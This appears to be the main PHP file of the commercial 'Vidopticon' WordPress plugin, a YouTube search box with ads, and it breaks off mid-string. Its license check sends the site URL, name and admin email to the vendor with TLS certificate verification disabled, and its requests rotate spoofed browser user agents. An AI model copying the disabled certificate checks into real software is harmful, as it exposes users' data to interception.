<?php
/** 
Plugin Name: Vidopticon - Your Own Video Search Engine
Plugin URI: //1.envato.market/vidopticon
Description: This plugin can embed your own video search engine with ads, to your site.
Author: CodeRevolution
Version: 1.0.5.2
Author URI: //coderevolution.ro
License: Commercial. For personal use only. Not to give away or resell.
Text Domain: vidopticon-video-search-engine
*/
/*  
Copyright 2016 - 2024 CodeRevolution
*/
defined('ABSPATH') or die();
require_once (dirname(__FILE__) . "/res/other/plugin-dash.php"); 


function vidopticon_load_textdomain() {
    load_plugin_textdomain( 'vidopticon-video-search-engine', false, basename( dirname( __FILE__ ) ) . '/languages' ); 
}
add_action( 'init', 'vidopticon_load_textdomain' );


function vidopticon_get_random_user_agent() {
	$agents = array(
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36",
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36",
		"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36",
		"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36",
		"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8",
		"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36",
		"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36",
		"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0",
		"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0",
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36",
		"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
		"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0",
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
		"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36",
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063",
		"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0",
		"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0",
		"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36",
		"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36",
		"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
	);
	$rand   = rand( 0, count( $agents ) - 1 );
	return trim( $agents[ $rand ] );
}
$plugin = plugin_basename(__FILE__);
if(is_admin())
{
    if($_SERVER["REQUEST_METHOD"]==="POST" && !empty($_POST["coderevolution_max_input_var_data"])) {
    $vars = explode("&", $_POST["coderevolution_max_input_var_data"]);
    $coderevolution_max_input_var_data = array();
    foreach($vars as $var) {
        parse_str($var, $variable);
        vidopticon_assign_var($_POST, $variable, true);
    }
	unset($_POST["coderevolution_max_input_var_data"]);
}
    $plugin_slug = explode('/', $plugin);
    $plugin_slug = $plugin_slug[0];
    if(isset($_POST[$plugin_slug . '_register']) && isset($_POST[$plugin_slug. '_register_code']) && trim($_POST[$plugin_slug . '_register_code']) != '')
    {
        update_option('coderevolution_settings_changed', 1);
        if(strlen(trim($_POST[$plugin_slug . '_register_code'])) != 36 || strstr($_POST[$plugin_slug . '_register_code'], '-') == false)
        {
            vidopticon_log_to_file('Invalid registration code submitted: ' . $_POST[$plugin_slug . '_register_code']);
        }
        else
        {
            $ch = curl_init('https://wpinitiate.com/verify-purchase/purchase.php');
            if($ch !== false)
            {
                $data           = array();
                $data['code']   = trim($_POST[$plugin_slug . '_register_code']);
                $data['siteURL']   = get_bloginfo('url');
                $data['siteName']   = get_bloginfo('name');
                $data['siteEmail']   = get_bloginfo('admin_email');
                $fdata = "";
                foreach ($data as $key => $val) {
                    $fdata .= "$key=" . urlencode(trim($val)) . "&";
                }
                curl_setopt($ch, CURLOPT_POST, 1);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $fdata);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
                curl_setopt($ch, CURLOPT_TIMEOUT, 60);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                $result = curl_exec($ch);
                
                if($result === false)
                {
                    vidopticon_log_to_file('Failed to get verification response: ' . curl_error($ch));
                    curl_close($ch);
                }
                else
                {
                    curl_close($ch);
                    $rj = json_decode($result, true);
                    if(isset($rj['error']))
                    {
                        update_option('coderevolution_settings_changed', $rj['error']);
                    }
                    elseif(isset($rj['item_name']))
                    {
                        $rj['code'] = $_POST[$plugin_slug . '_register_code'];
                        if($rj['item_id'] == '23270074' || $rj['item_id'] == '13371337' || $rj['item_id'] == '19200046')
                        {
                            update_option($plugin_slug . '_registration', $rj);
                            update_option('coderevolution_settings_changed', 2);
                        }
                        else
                        {
                            vidopticon_log_to_file('Invalid response from purchase code verification (are you sure you inputed the right purchase code?): ' . print_r($rj, true));
                        }
                    }
                    else
                    {
                        vidopticon_log_to_file('Invalid json from purchase code verification: ' . print_r($result, true));
                    }
                }
            }
            else
            {
                vidopticon_log_to_file('Failed to init curl when trying to make purchase verification.');
            }
        }
    }
    if(isset($_POST[$plugin_slug . '_revoke_license']) && trim($_POST[$plugin_slug . '_revoke_license']) != '')
    {
        $ch = curl_init('https://wpinitiate.com/verify-purchase/revoke.php');
        if($ch !== false)
        {
            $data           = array();
            $data['siteURL']   = get_bloginfo('url');
            $fdata = "";
            foreach ($data as $key => $val) {
                $fdata .= "$key=" . urlencode(trim($val)) . "&";
            }
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $fdata);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
            curl_setopt($ch, CURLOPT_TIMEOUT, 60);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
            $result = curl_exec($ch);
            
            if($result === false)
            {
                vidopticon_log_to_file('Failed to revoke verification response: ' . curl_error($ch));
                update_option($plugin_slug . '_registration', false);
            }
            else
            {
                update_option($plugin_slug . '_registration', false);
            }
        }
        else
        {
            vidopticon_log_to_file('Failed to init curl to revoke verification response.');
        }
    }
    $uoptions = get_option($plugin_slug . '_registration', array());
    if(isset($uoptions['item_id']) && isset($uoptions['item_name']) && isset($uoptions['created_at']) && isset($uoptions['buyer']) && isset($uoptions['licence']) && isset($uoptions['supported_until']))
    {
        require "update-checker/plugin-update-checker.php";
        $fwdu3dcarPUC = YahnisElsts\PluginUpdateChecker\v5\PucFactory::buildUpdateChecker("https://wpinitiate.com/auto-update/?action=get_metadata&slug=vidopticon-video-search-engine", __FILE__, "vidopticon-video-search-engine");
    }
    else
    {
        add_action("after_plugin_row_{$plugin}", function( $plugin_file, $plugin_data, $status ) {
            $plugin_url = 'https://codecanyon.net/item/vidopticon-video-search-engine-plugin-for-wordpress/23270074';
            echo '<tr class="active"><td>&nbsp;</td><td colspan="2"><p class="cr_auto_update">';
          echo sprintf( wp_kses( __( 'The plugin is not registered. Automatic updating is disabled. Please purchase a license for it from <a href="%s" target="_blank">here</a> and register  the plugin from the \'Main Settings\' menu using your purchase code. <a href="%s" target="_blank">How I find my purchase code?', 'vidopticon-video-search-engine'), array(  'a' => array( 'href' => array(), 'target' => array() ) ) ), esc_url_raw( 'https://1.envato.market/c/1264868/275988/4415?u=' . urlencode($plugin_url)), esc_url_raw('//www.youtube.com/watch?v=NElJ5t_Wd48') );     
          echo '</a></p> </td></tr>';
        }, 10, 3 );
        add_action('admin_enqueue_scripts', 'vidopticon_admin_enqueue_all');
        add_filter("plugin_action_links_$plugin", 'vidopticon_add_activation_link');
    }
}
function vidopticon_admin_enqueue_all()
{
    $reg_css_code = '.cr_auto_update{background-color:#fff8e5;margin:5px 20px 15px 20px;border-left:4px solid #fff;padding:12px 12px 12px 12px !important;border-left-color:#ffb900;}';
    wp_register_style( 'vidopticon-plugin-reg-style', false );
    wp_enqueue_style( 'vidopticon-plugin-reg-style' );
    wp_add_inline_style( 'vidopticon-plugin-reg-style', $reg_css_code );
}
function vidopticon_assign_var(&$target, $var, $root = false) {
	static $cnt = 0;
    $key = key($var);
    if(is_array($var[$key])) 
        vidopticon_assign_var($target[$key], $var[$key], false);
    else {
        if($key==0)
		{
			if($cnt == 0 && $root == true)
			{
				$target['_vidopticonr_nonce'] = $var[$key];
				$cnt++;
			}
			elseif($cnt == 1 && $root == true)
			{
				$target['_wp_http_referer'] = $var[$key];
				$cnt++;
			}
			else
			{
				$target[] = $var[$key];
			}
		}
        else
		{
            $target[$key] = $var[$key];
		}
    }   
}
function vidopticon_add_activation_link($links)
{
    $settings_link = '<a href="admin.php?page=vidopticon_admin_settings">' . esc_html__('Activate Plugin License', 'vidopticon-video-search-engine') . '</a>';
    array_push($links, $settings_link);
    return $links;
}

add_action('admin_menu', 'vidopticon_register_my_custom_menu_page');
add_action('network_admin_menu', 'vidopticon_register_my_custom_menu_page');
function vidopticon_register_my_custom_menu_page()
{
    add_menu_page('Vidopticon - Your Own Search Engine', 'Vidopticon - Your Own Search Engine', 'manage_options', 'vidopticon_admin_settings', 'vidopticon_admin_settings', plugins_url('images/icon.png', __FILE__));
    $main = add_submenu_page('vidopticon_admin_settings', esc_html__("Main Settings", 'vidopticon-video-search-engine'), esc_html__("Main Settings", 'vidopticon-video-search-engine'), 'manage_options', 'vidopticon_admin_settings');
    add_action( 'load-' . $main, 'vidopticon_load_all_admin_js' );
    add_action( 'load-' . $main, 'vidopticon_load_main_admin_js' );
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    if (isset($vidopticon_Main_Settings['vidopticon_enabled']) && $vidopticon_Main_Settings['vidopticon_enabled'] == 'on') {
        $ad = add_submenu_page('vidopticon_admin_settings', esc_html__('Ad Manager', 'vidopticon-video-search-engine'), esc_html__('Ad Manager', 'vidopticon-video-search-engine'), 'manage_options', 'vidopticon_ads_panel', 'vidopticon_ads_panel');
        add_action( 'load-' . $ad, 'vidopticon_load_all_admin_js' );
        add_action( 'load-' . $ad, 'vidopticon_load_rule_js' );
        $usage = add_submenu_page('vidopticon_admin_settings', esc_html__('Usage Tracking', 'vidopticon-video-search-engine'), esc_html__('Usage Tracking', 'vidopticon-video-search-engine'), 'manage_options', 'vidopticon_tracking', 'vidopticon_tracking');
        add_action( 'load-' . $usage, 'vidopticon_load_all_admin_js' );
        $logs = add_submenu_page('vidopticon_admin_settings', esc_html__("Activity & Logging", 'vidopticon-video-search-engine'), esc_html__("Activity & Logging", 'vidopticon-video-search-engine'), 'manage_options', 'vidopticon_logs', 'vidopticon_logs');
        add_action( 'load-' . $logs, 'vidopticon_load_all_admin_js' );
    }
}
function vidopticon_load_rule_js(){
    add_action('admin_enqueue_scripts', 'vidopticon_enqueue_rule_admin_js');
}

function vidopticon_enqueue_rule_admin_js(){
    wp_enqueue_script('vidopticon-footer-script', plugins_url('scripts/footer.js', __FILE__), array('jquery'), false, true);
    $cr_miv = ini_get('max_input_vars');
	if($cr_miv === null || $cr_miv === false || !is_numeric($cr_miv))
	{
        $cr_miv = '9999999';
    }
    $footer_conf_settings = array(
        'max_input_vars' => $cr_miv,
        'plugin_dir_url' => plugin_dir_url(__FILE__),
        'ajaxurl' => admin_url('admin-ajax.php')
    );
    wp_localize_script('vidopticon-footer-script', 'mycustomsettings', $footer_conf_settings);
    wp_register_style('vidopticon-rules-style', plugins_url('styles/vidopticon-rules.css', __FILE__), false, '1.0.0');
    wp_enqueue_style('vidopticon-rules-style');
}
function vidopticon_load_main_admin_js(){
    add_action('admin_enqueue_scripts', 'vidopticon_enqueue_main_admin_js');
}

function vidopticon_enqueue_main_admin_js(){
    wp_enqueue_script('vidopticon-main-script', plugins_url('scripts/main.js', __FILE__), array('jquery'));
}
function vidopticon_load_all_admin_js(){
    add_action('admin_enqueue_scripts', 'vidopticon_admin_load_files');
}
function vidopticon_get_date_now($param = 'now')
{
    $date = new DateTime($param);
    $date = (array)$date;
    foreach ($date as $key => $value) {
        if ($key == 'date') {
            return $value;
        }
    }
    return '';
}

$plugin = plugin_basename(__FILE__);
add_action('init', 'vidopticon_init_func', 0);
add_action( 'enqueue_block_editor_assets', 'vidopticon_enqueue_block_editor_assets' );
function vidopticon_enqueue_block_editor_assets() {
    wp_register_style('vidopticon-browser-style', plugins_url('styles/vidopticon-browser.css', __FILE__), false, '1.0.0');
    wp_enqueue_style('vidopticon-browser-style');
	$block_js_list   = 'scripts/search-box.js';
	wp_enqueue_script(
		'vidopticon-search-box-block-js', 
        plugins_url( $block_js_list, __FILE__ ), 
        array(
			'wp-blocks',
			'wp-i18n',
			'wp-element',
		),
        '1.0.0'
	);
    $block_js_list   = 'scripts/redirect-box.js';
	wp_enqueue_script(
		'vidopticon-redirect-box-block-js', 
        plugins_url( $block_js_list, __FILE__ ), 
        array(
			'wp-blocks',
			'wp-i18n',
			'wp-element',
		),
        '1.0.0'
	);
}
function vidopticon_init_func()
{
    if ( function_exists( 'register_block_type' ) ) {
        register_block_type( 'vidopticon-video-search-engine/search-box', array(
            'render_callback' => 'vidopticon_display_custom_search_form',
        ) );
    }
    if ( function_exists( 'register_block_type' ) ) {
        register_block_type( 'vidopticon-video-search-engine/redirect-box', array(
            'render_callback' => 'vidopticon_display_custom_search_redirect',
        ) );
    }
}
function vidopticon_add_rating_link($links)
{
    $settings_link = '<a href="//codecanyon.net/downloads" target="_blank" title="Rate">
            <i class="wdi-rate-stars"><svg xmlns="http://www.w3.org/2000/svg" width="15" height="15" viewBox="0 0 24 24" fill="#ffb900" stroke="#ffb900" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-star"><polygon points="12 2 15.09 8.26 22 9.27 17 14.14 18.18 21.02 12 17.77 5.82 21.02 7 14.14 2 9.27 8.91 8.26 12 2"></polygon></svg><svg xmlns="http://www.w3.org/2000/svg" width="15" height="15" viewBox="0 0 24 24" fill="#ffb900" stroke="#ffb900" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-star"><polygon points="12 2 15.09 8.26 22 9.27 17 14.14 18.18 21.02 12 17.77 5.82 21.02 7 14.14 2 9.27 8.91 8.26 12 2"></polygon></svg><svg xmlns="http://www.w3.org/2000/svg" width="15" height="15" viewBox="0 0 24 24" fill="#ffb900" stroke="#ffb900" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-star"><polygon points="12 2 15.09 8.26 22 9.27 17 14.14 18.18 21.02 12 17.77 5.82 21.02 7 14.14 2 9.27 8.91 8.26 12 2"></polygon></svg><svg xmlns="http://www.w3.org/2000/svg" width="15" height="15" viewBox="0 0 24 24" fill="#ffb900" stroke="#ffb900" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-star"><polygon points="12 2 15.09 8.26 22 9.27 17 14.14 18.18 21.02 12 17.77 5.82 21.02 7 14.14 2 9.27 8.91 8.26 12 2"></polygon></svg><svg xmlns="http://www.w3.org/2000/svg" width="15" height="15" viewBox="0 0 24 24" fill="#ffb900" stroke="#ffb900" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-star"><polygon points="12 2 15.09 8.26 22 9.27 17 14.14 18.18 21.02 12 17.77 5.82 21.02 7 14.14 2 9.27 8.91 8.26 12 2"></polygon></svg></i></a>';
    array_push($links, $settings_link);
    return $links;
}
add_filter("plugin_action_links_$plugin", 'vidopticon_add_support_link');
function vidopticon_add_support_link($links)
{
    $settings_link = '<a href="//coderevolution.ro/knowledge-base/" target="_blank">' . esc_html__('Support', 'vidopticon-video-search-engine') . '</a>';
    array_push($links, $settings_link);
    return $links;
}
add_filter("plugin_action_links_$plugin", 'vidopticon_add_settings_link');
add_filter("plugin_action_links_$plugin", 'vidopticon_add_rating_link');
function vidopticon_add_settings_link($links)
{
    $settings_link = '<a href="admin.php?page=vidopticon_admin_settings">' . esc_html__('Settings', 'vidopticon-video-search-engine') . '</a>';
    array_push($links, $settings_link);
    return $links;
}

function vidopticon_auto_clear_log()
{
    global $wp_filesystem;
    if ( ! is_a( $wp_filesystem, 'WP_Filesystem_Base') ){
        include_once(ABSPATH . 'wp-admin/includes/file.php');$creds = request_filesystem_credentials( site_url() );
       wp_filesystem($creds);
    }
    if ($wp_filesystem->exists(WP_CONTENT_DIR . '/vidopticon_info.log')) {
        $wp_filesystem->delete(WP_CONTENT_DIR . '/vidopticon_info.log');
    }
}

register_deactivation_hook(__FILE__, 'vidopticon_my_deactivation');
function vidopticon_my_deactivation()
{
    wp_clear_scheduled_hook('vidopticonactionclear');
}
add_action('vidopticonactionclear', 'vidopticon_auto_clear_log');

function vidopticon_cron_schedule()
{
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    if (isset($vidopticon_Main_Settings['vidopticon_enabled']) && $vidopticon_Main_Settings['vidopticon_enabled'] === 'on') {
        if (isset($vidopticon_Main_Settings['enable_logging']) && $vidopticon_Main_Settings['enable_logging'] === 'on' && isset($vidopticon_Main_Settings['auto_clear_logs']) && $vidopticon_Main_Settings['auto_clear_logs'] !== 'No') {
            if (!wp_next_scheduled('vidopticonactionclear')) {
                $rez = wp_schedule_event(time(), $vidopticon_Main_Settings['auto_clear_logs'], 'vidopticonactionclear');
                if ($rez === FALSE) {
                    vidopticon_log_to_file('[Scheduler] Failed to schedule vidopticonactionclear to ' . $vidopticon_Main_Settings['auto_clear_logs'] . '!');
                }
                add_option('vidopticon_schedule_time', $vidopticon_Main_Settings['auto_clear_logs']);
            } else {
                if (!get_option('vidopticon_schedule_time')) {
                    wp_clear_scheduled_hook('vidopticonactionclear');
                    $rez = wp_schedule_event(time(), $vidopticon_Main_Settings['auto_clear_logs'], 'vidopticonactionclear');
                    add_option('vidopticon_schedule_time', $vidopticon_Main_Settings['auto_clear_logs']);
                    if ($rez === FALSE) {
                        vidopticon_log_to_file('[Scheduler] Failed to schedule vidopticonactionclear to ' . $vidopticon_Main_Settings['auto_clear_logs'] . '!');
                    }
                } else {
                    $the_time = get_option('vidopticon_schedule_time');
                    if ($the_time != $vidopticon_Main_Settings['auto_clear_logs']) {
                        wp_clear_scheduled_hook('vidopticonactionclear');
                        delete_option('vidopticon_schedule_time');
                        $rez = wp_schedule_event(time(), $vidopticon_Main_Settings['auto_clear_logs'], 'vidopticonactionclear');
                        add_option('vidopticon_schedule_time', $vidopticon_Main_Settings['auto_clear_logs']);
                        if ($rez === FALSE) {
                            vidopticon_log_to_file('[Scheduler] Failed to schedule vidopticonactionclear to ' . $vidopticon_Main_Settings['auto_clear_logs'] . '!');
                        }
                    }
                }
            }
        } else {
            if (!wp_next_scheduled('vidopticonactionclear')) {
                delete_option('vidopticon_schedule_time');
            } else {
                wp_clear_scheduled_hook('vidopticonactionclear');
                delete_option('vidopticon_schedule_time');
            }
        }
    } else {
        if (!wp_next_scheduled('vidopticonactionclear')) {
            delete_option('vidopticon_schedule_time');
        } else {
            wp_clear_scheduled_hook('vidopticonactionclear');
            delete_option('vidopticon_schedule_time');
        }
    }
}

function vidopticon_log_to_file($str)
{
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    if (isset($vidopticon_Main_Settings['enable_logging']) && $vidopticon_Main_Settings['enable_logging'] == 'on') {
        $d = date("j-M-Y H:i:s e", current_time( 'timestamp' ));
        error_log("[$d] " . $str . "<br/>\r\n", 3, WP_CONTENT_DIR . '/vidopticon_info.log');
    }
}

function vidopticon_track_to_file($str)
{
    $d = date("j-M-Y H:i:s e", current_time( 'timestamp' ));
    error_log("[$d] " . $str . "<br/>\r\n", 3, WP_CONTENT_DIR . '/vidopticon_tracking.log');
}
add_shortcode( 'vidopticon-search-redirect', 'vidopticon_display_custom_search_redirect' );
function vidopticon_display_custom_search_redirect( $atts ) {
    if ( is_admin() ) 
    {
        return;
    }
    $timeout = 3600;
    ini_set('memory_limit', '-1');
    ini_set('default_socket_timeout', $timeout);
    ini_set('safe_mode', 'Off');
    ini_set('max_execution_time', $timeout);
    ini_set('ignore_user_abort', 1);
    ini_set('user_agent', vidopticon_get_random_user_agent());
    if(function_exists('ignore_user_abort'))
{
    ignore_user_abort(true);
}
    if(function_exists('set_time_limit'))
{
    set_time_limit($timeout);
}
    $css_code = '';
    extract(shortcode_atts(array(
        'redirect_page' => '',
        'search_text' => 'Search now:',
        'search_description' => '&nbsp;Search...',
        'search_prefill' => '',
        'find_text' => 'find',
        'width' => 'auto',
        'backgound_color' => '#FFFFFF',
        'border_color' => '#919294',
        'border_width' => '1px',
        'font_type' => 'Arial, sans-serif',
        'font_size' => '13px',
        'navigation_font_size' => '20px',
        'text_color' => '#000000',
        'link_color' => '#198ADC',
        'search_type' => 'youtube'
    ), $atts));
    $redirect_page = trim($redirect_page);
    if($redirect_page == '')
    {
        return '';
    }
    $search_type = trim($search_type);
    if($search_type != 'youtube')
    {
        $search_type = 'youtube';
    }
    
    $vidopticon_Main_Settings = get_option('vidopticon_Main_Settings', false);
    if (!isset($vidopticon_Main_Settings['app_id']) || trim($vidopticon_Main_Settings['app_id']) == '') {
        return esc_html__('You need to enter a YouTube API key for this to function!', 'vidopticon-video-search-engine');
    }
    if (isset($vidopticon_Main_Settings['vidopticon_enabled']) && $vidopticon_Main_Settings['vidopticon_enabled'] === 'on') {
        $scriptcode = 'if(typeof jQuery==\'undefined\') {
            var headTag = document.getElementsByTagName("head")[0];
            var jqTag = document.createElement(\'script\');
            jqTag.type = \'text/javascript\';
            jqTag.src = \'https://code.jquery.com/jquery-1.11.3.min.js\';
            jqTag.onload = vidopticonJQueryCode;
            headTag.appendChild(jqTag);
            }else{vidopticonJQueryCode();}
            function vidopticonJQueryCode()
            {';
            $scriptcode .= 'jQuery(document).ready(function(){
                jQuery(\'#pnpredirectwhat\').keypress(function(e){
                  if(e.keyCode==13)
                  {
                      jQuery(\'#vidopticon-submit-redirect-form\').on(\'click\', );
                      e.preventDefault();
                  }
                });
        });
    }
}';
if (isset($vidopticon_Main_Settings['voice_recog']) && $vidopticon_Main_Settings['voice_recog'] === 'on') {
$scriptcode .= 'try {
    var SpeechRecognition = window.SpeechRecognition || window.webkitSpeechRecognition;
    var recognition = new SpeechRecognition();
    recognition.onstart = function() {
      jQuery(\'#vidopticon_voice_status_r\').text("';
      if (isset($vidopticon_Main_Settings['voice_started']) && $vidopticon_Main_Settings['voice_started'] != '') {
          $scriptcode .= $vidopticon_Main_Settings['voice_started'];
      }
      else
      {
          $scriptcode .= esc_html__('Voice recognition activated. Try speaking into the microphone.', 'vidopticon-video-search-engine');
      }
      $scriptcode .= '");
    }

    recognition.onspeechend = function() {
      jQuery(\'#vidopticon_voice_status_r\').text("';
      if (isset($vidopticon_Main_Settings['voice_paused']) && $vidopticon_Main_Settings['voice_paused'] != '') {
          $scriptcode .= $vidopticon_Main_Settings['voice_paused'];
      }
      else
      {
          $scriptcode .= esc_html__('You were quiet for a while so voice recognition turned itself off.', 'vidopticon-video-search-engine');
      }
      $scriptcode .= '");
        jQuery("#vidopticon_voice_button_r").html(\'\\uf130\');
        started_r = false;
    }

    recognition.onerror = function(event) {
      if(event.error == \'no-speech\') {
        jQuery(\'#vidopticon_voice_status_r\').text("';
      if (isset($vidopticon_Main_Settings['voice_failed']) && $vidopticon_Main_Settings['voice_failed'] != '') {
          $scriptcode .= $vidopticon_Main_Settings['voice_failed'];
      }
      else
      {
          $scriptcode .= esc_html__('No speech was detected. Try again.', 'vidopticon-video-search-engine');
      }
      $scriptcode .= '");
        jQuery("#vidopticon_voice_button_r").html(\'\\uf130\');
        started_r = false;
      };
    }
    recognition.onresult = function(event) {
      var current = event.resultIndex;
      var transcript = event.results[current][0].transcript;
      noteContent = jQuery(\'#pnpredirectwhat\').val();
      var mobileRepeatBug = false;
      if(current == 1)
      {
          if(transcript == event.results[0][0].transcript)
          {
              mobileRepeatBug = true;
          }
      }
      if(!mobileRepeatBug) {
          noteContent += " " + transcript;
          jQuery(\'#pnpredirectwhat\').val(noteContent);
      }
    }
    var started_r = false;
    jQuery(\'#vidopticon_voice_button_r\').on(\'click\', function(e) {
      if(started_r == false)
      {
          started_r = true;
          recognition.start();
          jQuery("#vidopticon_voice_button_r").html(\'\\uf131\');
      }
      else
      {
          started_r = false;
          recognition.stop();
          jQuery("#vidopticon_voice_button_r").html(\'\\uf130\');
      }
    });
}
catch(e) {
  console.error(\'' . esc_html__('No browser support:', 'vidopticon-video-search-engine') . ' \' . e);
}';
}
if(!wp_script_is('vidopticon-dummy-handle'))
{
    wp_register_script( 'vidopticon-dummy-handle', '', [], '', true );
    wp_enqueue_script( 'vidopticon-dummy-handle'  );
}
wp_add_inline_script( 'vidopticon-dummy-handle', $scriptcode );
$css_code = '.autocomplete-items {
  border: 1px solid #d4d4d4;
  border-bottom: none;
  border-top: none;
  z-index: 99;
  top: 100%;
  left: 0;
  right: 0;
}
.autocomplete-items div {
  padding: 10px;
  cursor: pointer;
  background-color: #fff; 
  border-bottom: 1px solid #d4d4d4; 
}
.autocomplete-items div:hover {
  background-color: #e9e9e9; 
}
.autocomplete-active {
  background-color: DodgerBlue !important; 
  color: #ffffff; 
}
div.pnpsearchbox{
text-align: left ; 
border: ' . esc_html($border_width) . ' solid ' . esc_html($border_color) . '; 
background-color: ' . esc_html($backgound_color) . ';
padding: 8px ; 
font-family: ' . esc_html($font_type) . '; 
font-size: ' . esc_html($font_size) . '; 
color: ' . esc_html($text_color) . '; 
width: ' . esc_html($width) . ';
}
.pnpnavig { 
font-size: ' . esc_html($navigation_font_size) . '; 
}
div.pnpsearchbox a{ 
color: ' . esc_html($link_color) . '; 
}
div.pnpbotl a{
   color: ' . esc_html($link_color) . ';
}
div.pnpsearchbox form.pnpsearchform{ 
padding-top: 0px ; 
padding-bottom: 0px ; 
padding-left: 0px ; 
padding-right: 0px ;
}
div#pnpSearchResult{ 
}
div#pnpSearchResult p.topline{ 
font-size: 16px ; 
font-weight: bold ; 
margin-bottom: 8px ; 
margin-top: 5px ;
}
span.pnplabel{ 
word-wrap: break-word;
white-space:normal;
font-size: 13px ; 
font-weight: bold ; 
color: ' . esc_html($text_color) . '; 
}
span.pnplabelsmall{ 
word-wrap: break-word;
white-space:normal;
font-size: 11px ; 
color: ' . esc_html($text_color) . '; 
}
input.pnpinput{ 
width: 90%; 

border: 1px solid #AAA;
border-right: 1px solid #DDD;
border-bottom: 1px solid #DDD;
margin-top:2px;
margin-bottom:2px;
}
input.pnpinput{ 
    color: #642891;
}
input.pnpbutton{  
font-family:  ' . esc_html($font_type) . '; 
}
div.pnpsearch{ 
margin: 0px ; 
margin-bottom: 10px ; 
overflow: hidden ;
}
div.pnpsearch p { 
margin: 0px ; 
}
div.pnpsearch p.searchtitle{ 
font-size: 14 ; 
font-weight: bold ;
}
div.pnpsearch .company{ 
color: #666666; 
}
div.pnpsearch .locations{ 
color: #666666;
}
div.pnpsearch .site{ 
color: #099E2D ; 
}
#vidopticon_voice_button_r {
color:#000000;
font-size: 16px;
font-weight: bold;
cursor: pointer;
}
#search_box_tools span.button{
float:left;
color:#666;
text-align:center;
margin-left:5px;
margin-right:5px;
}
#search_box_tools span.button input{
float:left ;
color:#FFFFFF;
font-size: 16px;
font-weight: bold;
cursor: pointer;
border: 1px solid #d70;
-webkit-border-radius: 2px;
-moz-border-radius: 3px;
border-radius: 2px;
background: #e81;
background-image: linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -o-linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -moz-linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -webkit-linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -ms-linear-gradient(top, #F19F40 0%, #EE8711 100%);
background-image: -webkit-gradient(linear,left top,left bottom,color-stop(0, #F19F40),color-stop(1, #EE8711));
}
.bloggerDiv{display:none;}td {border: 0px solid transparent !important;}';
if (isset($vidopticon_Main_Settings['img_x']) && $vidopticon_Main_Settings['img_x'] != '') {$img_x = $vidopticon_Main_Settings['img_x'];}else{$img_x = '8';}if (isset($vidopticon_Main_Settings['img_y']) && $vidopticon_Main_Settings['img_y'] != '') {$img_y = $vidopticon_Main_Settings['img_y'];}else{$img_y = '-30';}
$css_code .= '.vidopticon_xo
{
position: relative;z-index: 666;top: ' . esc_html($img_y) . 'px;left: ' . esc_html($img_x) . 'px;
}';

$code = '<a name="pnpsearchboxanchor"></a>
<div class="pnpsearchbox">
